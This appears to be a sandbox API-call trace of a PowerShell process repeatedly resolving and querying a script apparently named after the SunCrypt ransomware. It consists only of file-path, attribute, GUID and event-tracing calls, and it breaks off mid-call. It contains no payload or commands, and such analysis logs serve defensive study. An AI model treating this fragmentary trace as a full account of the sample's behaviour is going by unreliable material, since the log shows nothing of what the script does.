GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.448] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.450] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701326634021) returned 1 [0100.450] EtwEventActivityIdControl () returned 0x0 [0100.450] EtwEventActivityIdControl () returned 0x0 [0100.450] EtwEventActivityIdControl () returned 0x0 [0100.450] EtwEventActivityIdControl () returned 0x0 [0100.451] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x59fb2fa3, Data2=0x6a43, Data3=0x43e3, Data4=([0]=0x91, [1]=0xf5, [2]=0xf6, [3]=0x65, [4]=0xeb, [5]=0xf6, [6]=0x24, [7]=0xe7))) returned 0x0 [0100.451] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.451] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.451] CoTaskMemFree (pv=0x427a048) [0100.452] EtwEventActivityIdControl () returned 0x0 [0100.452] EtwEventActivityIdControl () returned 0x0 [0100.452] EtwEventActivityIdControl () returned 0x0 [0100.452] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701326863713) returned 1 [0100.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0100.452] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0100.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.456] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701327222979) returned 1 [0100.497] EtwEventActivityIdControl () returned 0x0 [0100.602] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x97490a07, Data2=0x94a1, Data3=0x402f, Data4=([0]=0xa5, [1]=0xf8, [2]=0xce, [3]=0xf3, [4]=0xf9, [5]=0x56, [6]=0x57, [7]=0xaf))) returned 0x0 [0100.602] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.602] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.602] CoTaskMemFree (pv=0x427a048) [0100.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.603] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.606] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701342256826) returned 1 [0100.606] EtwEventActivityIdControl () returned 0x0 [0100.606] EtwEventActivityIdControl () returned 0x0 [0100.606] EtwEventActivityIdControl () returned 0x0 [0100.607] EtwEventActivityIdControl () returned 0x0 [0100.607] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x825c708f, Data2=0xf592, Data3=0x4ef3, Data4=([0]=0x98, [1]=0xbb, [2]=0x4f, [3]=0xc4, [4]=0xd5, [5]=0xce, [6]=0x8a, [7]=0x84))) returned 0x0 [0100.608] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.608] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.608] CoTaskMemFree (pv=0x427a048) [0100.608] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701342468968) returned 1 [0100.608] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.608] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.608] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.612] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701342846136) returned 1 [0100.612] EtwEventActivityIdControl () returned 0x0 [0100.612] EtwEventActivityIdControl () returned 0x0 [0100.612] EtwEventActivityIdControl () returned 0x0 [0100.613] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0xe778dc14, Data2=0x1f8c, Data3=0x46ae, Data4=([0]=0xa0, [1]=0xb5, [2]=0xdd, [3]=0x31, [4]=0xee, [5]=0x39, [6]=0xc6, [7]=0x8b))) returned 0x0 [0100.613] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.613] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.613] CoTaskMemFree (pv=0x427a048) [0100.614] EtwEventActivityIdControl () returned 0x0 [0100.614] EtwEventActivityIdControl () returned 0x0 [0100.614] EtwEventActivityIdControl () returned 0x0 [0100.615] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe87c | out: lpPerformanceCount=0x4ebe87c*=1701343118206) returned 1 [0100.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0100.615] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0100.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.618] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701343484081) returned 1 [0100.812] EtwEventActivityIdControl () returned 0x0 [0100.815] EtwEventActivityIdControl () returned 0x0 [0100.815] EtwEventActivityIdControl () returned 0x0 [0100.815] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xff49c87d, Data2=0x6378, Data3=0x4f20, Data4=([0]=0x9d, [1]=0x4f, [2]=0x74, [3]=0xcc, [4]=0xff, [5]=0x7e, [6]=0x15, [7]=0xd1))) returned 0x0 [0100.815] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.815] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.815] CoTaskMemFree (pv=0x427a048) [0100.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.815] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.816] EtwEventActivityIdControl () returned 0x0 [0100.816] EtwEventActivityIdControl () returned 0x0 [0100.817] EtwEventActivityIdControl () returned 0x0 [0100.817] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0x680258d7, Data2=0xb284, Data3=0x45be, Data4=([0]=0xac, [1]=0xb6, [2]=0x3a, [3]=0xcc, [4]=0xe4, [5]=0xfb, [6]=0x6f, [7]=0x4a))) returned 0x0 [0100.817] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.817] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.817] CoTaskMemFree (pv=0x427a048) [0100.817] EtwEventActivityIdControl () returned 0x0 [0100.817] EtwEventActivityIdControl () returned 0x0 [0100.817] EtwEventActivityIdControl () returned 0x0 [0100.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0100.818] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0100.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.821] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701363737188) returned 1 [0100.890] EtwEventActivityIdControl () returned 0x0 [0100.894] EtwEventActivityIdControl () returned 0x0 [0100.894] EtwEventActivityIdControl () returned 0x0 [0100.894] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa902c150, Data2=0xa77f, Data3=0x4b6c, Data4=([0]=0xa3, [1]=0xa7, [2]=0x1d, [3]=0x4c, [4]=0x92, [5]=0x56, [6]=0x12, [7]=0xad))) returned 0x0 [0100.894] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.894] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.894] CoTaskMemFree (pv=0x427a048) [0100.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.901] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.902] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.902] EtwEventActivityIdControl () returned 0x0 [0100.902] EtwEventActivityIdControl () returned 0x0 [0100.902] EtwEventActivityIdControl () returned 0x0 [0100.902] EtwEventActivityIdControl () returned 0x0 [0100.902] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x4fd61319, Data2=0x1769, Data3=0x4737, Data4=([0]=0x9c, [1]=0x78, [2]=0x13, [3]=0x2b, [4]=0x4d, [5]=0xa6, [6]=0x93, [7]=0xc6))) returned 0x0 [0100.903] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.903] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.903] CoTaskMemFree (pv=0x427a048) [0100.903] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.903] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.903] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.903] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.903] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0xb4d1eaf5, Data2=0xac71, Data3=0x469c, Data4=([0]=0xad, [1]=0x4a, [2]=0xe4, [3]=0x16, [4]=0x15, [5]=0x2a, [6]=0x1b, [7]=0x30))) returned 0x0 [0100.904] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.904] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.904] CoTaskMemFree (pv=0x427a048) [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.905] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0100.905] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: 